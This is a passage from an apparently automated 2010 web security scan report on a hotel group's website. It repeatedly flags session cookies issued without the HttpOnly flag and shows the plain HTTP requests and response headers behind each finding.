Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:29:40 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:29:40 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=30232f972f5c685430fc1263c5cd98ae; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Core Values - Red Carnation Hot
...[SNIP]...
2.5. http://www.redcarnationhotels.com/company-information/about-us/history  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /company-information/about-us/history

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /company-information/about-us/history HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/company-information/about-us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:28:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:28:10 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=5a2ce72c18fca6ac297fdedd29d07689; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>History - Red Carnation Hotels<
...[SNIP]...
2.6. http://www.redcarnationhotels.com/company-information/accessibility-info  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /company-information/accessibility-info

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /company-information/accessibility-info HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:28:08 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:28:08 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=a88ef9e0350b896e3c0fa96606c8227c; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Web Accessibility policy ... Re
...[SNIP]...
2.7. http://www.redcarnationhotels.com/company-information/best-rate-guarantee  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /company-information/best-rate-guarantee

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /company-information/best-rate-guarantee HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:27:36 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:27:36 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=6dcfbf58c508edc87108024a44bd1004; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Best Rate Guarantee</title>
<me
...[SNIP]...
2.8. http://www.redcarnationhotels.com/company-information/disclaimer  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /company-information/disclaimer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /company-information/disclaimer HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:27:51 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:27:51 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=abe29acb6d5854615f44223bd3203ec3; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30700

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Disclaimer and T&Cs - Red Carna
...[SNIP]...
2.9. http://www.redcarnationhotels.com/company-information/privacy-policy  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /company-information/privacy-policy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /company-information/privacy-policy HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/company-information/about-us
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:00 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:00 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=0043ff72577cd51e6272e4571531dea3; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Privacy Policy - Red Carnation
...[SNIP]...
2.10. http://www.redcarnationhotels.com/company-information/telephone-bookings  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /company-information/telephone-bookings

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /company-information/telephone-bookings HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:27:22 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:27:22 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=2d9594e1a0d09c150978b0da38cd1d55; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Telephone Bookings</title>
<met
...[SNIP]...
2.11. http://www.redcarnationhotels.com/contact-us  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /contact-us

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact-us HTTP/1.1
Host: www.redcarnationhotels.com
Proxy-Connection: keep-alive
Referer: http://www.redcarnationhotels.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmb=187643563; __utmc=187643563; __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:41 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:41 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=0d22fa26fc7a3888a78729de3b2aa4c5; path=/
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 40448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Contact Us - London, Florida, G
...[SNIP]...
2.12. http://www.redcarnationhotels.com/dining  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /dining

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dining HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=b403eb641c8dffd747c61c714d9d75b6;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:32:56 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:32:56 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=c8fcf4d5047b7e929197ec16491a2999; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Fine dining & hotel restaurants
...[SNIP]...
2.13. http://www.redcarnationhotels.com/faq  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /faq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /faq HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:39:20 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:39:20 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=3691b65d033f07333a5b8076728dd0ba; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>FAQ - Red Carnation Hotels</tit
...[SNIP]...
2.14. http://www.redcarnationhotels.com/london-offers  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /london-offers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /london-offers HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=147d0afef57869fb6da0dff7153a443c;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:21 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:21 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=767728f27962f5cd7261ee9a66948e93; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury London Hotel Deals & Off
...[SNIP]...
2.15. http://www.redcarnationhotels.com/meet-the-team  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /meet-the-team

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /meet-the-team HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:23:37 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:23:37 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=6b9511053bb709f5070e1fc1a78631e6; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Meet the Group Team - Luxury Ho
...[SNIP]...
2.16. http://www.redcarnationhotels.com/offers-and-gifts  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /offers-and-gifts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offers-and-gifts HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=dfc48a516e2595e48797f7ec699aad59;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:33:45 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:33:45 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=2b52beb91b1537662bbe83f4e05a93ac; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Luxury Weekend & Short Hotel Br
...[SNIP]...
2.17. http://www.redcarnationhotels.com/offers-and-gifts/gift-vouchers  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /offers-and-gifts/gift-vouchers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offers-and-gifts/gift-vouchers HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=dcf5c90f1a028d2043f3c5286a13bdf1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:36:29 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:36:29 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=953b91b9b59a23f915d0e39b7faa2a78; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Gift Experience Vouchers at The
...[SNIP]...
2.18. http://www.redcarnationhotels.com/our-hotels  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /our-hotels

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /our-hotels HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=b403eb641c8dffd747c61c714d9d75b6;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:56 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:56 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=bb2b87faa4bf29db4a661df002d373ad; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>The Best Hotels in the World, 5
...[SNIP]...
2.19. http://www.redcarnationhotels.com/our-responsibilities  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /our-responsibilities

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /our-responsibilities HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=d4906781592e1e5b19d7a052608c179a;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:33:58 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:33:58 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=7130d936a3463a6c8b92c51ea0b52718; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Corporate & Social Responsibili
...[SNIP]...
2.20. http://www.redcarnationhotels.com/partners  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /partners

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=ea8eb17fbf65691c1e359d451c8e1601;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:38:48 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:38:48 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=60761f2064b2ce5c95d191a87519b3d8; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Partners - Red Carnation Hotels
...[SNIP]...
2.21. http://www.redcarnationhotels.com/press-room  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /press-room

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /press-room HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=2efb02485258a99d48d9be041b8bd0c1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:30:10 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:30:10 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=2c6114f0af7c1e2ab9c507aacb9f262c; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Press Area - London Luxury Hote
...[SNIP]...
2.22. http://www.redcarnationhotels.com/press-room/destination-news  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.redcarnationhotels.com
Path:   /press-room/destination-news

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /press-room/destination-news HTTP/1.1
Host: www.redcarnationhotels.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.redcarnationhotels.com/
Cookie: __utmz=187643563.1286750010.1.1.utmccn=(referral)|utmcsr=milestonehotel.com|utmcct=/contact-us|utmcmd=referral; __utma=187643563.1167041678.1286750010.1286750010.1286750010.1; __utmc=187643563; __utmb=187643563; redcarnationhotels_session=dcf5c90f1a028d2043f3c5286a13bdf1;

Response

HTTP/1.1 200 OK
Date: Tue, 12 Oct 2010 02:34:15 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 12 Oct 2010 02:34:15 GMT
Cache-Control: private, no-store
Set-Cookie: redcarnationhotels_session=375ec69064b7f3e6fc2ffad07a3e5c1f; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35587

